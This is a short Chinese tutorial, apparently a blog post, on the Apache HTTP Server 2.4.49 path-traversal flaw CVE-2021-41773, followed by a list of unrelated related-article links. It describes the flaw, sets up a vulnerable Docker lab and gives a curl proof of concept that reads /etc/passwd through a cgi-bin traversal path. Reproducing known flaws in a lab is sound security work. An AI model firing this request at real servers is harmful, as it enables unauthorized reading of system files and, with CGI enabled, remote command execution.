Apache CVE-2021-41773 漏洞攻略

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

漏洞复现

http://172.16.1.78:8080/

1.使⽤poc

curl http://172.16.1.78:8080/cgi-bin/../../../../etc/passwd

2.⼯具验证

相关推荐
听说唐僧不吃肉2 小时前
Shell篇之编写apache启动脚本
apache
游王子8 小时前
Apache APISIX学习(1):介绍、docker启动
学习·apache
沈艺强19 小时前
伊犁云计算22-1 apache 安装rhel8
apache
新知图书19 小时前
Apache的ab压力测试工具与性能监控
测试工具·apache
鸠摩智首席音效师19 小时前
如何配置 Apache 反向代理服务器 ?
apache
Hello.Reader1 天前
深入解析 Apache Doris架构、应用场景与最佳实践
大数据·架构·数据分析·apache
Apache Flink2 天前
Apache Flink 流批融合技术介绍
人工智能·flink·apache
程序员皮皮林3 天前
开源PDF工具 Apache PDFBox 认识及使用(知识点+案例)
java·pdf·开源·apache
前端-文龙刚3 天前
小程序给对象赋值(双向绑定)方法之一
服务器·小程序·apache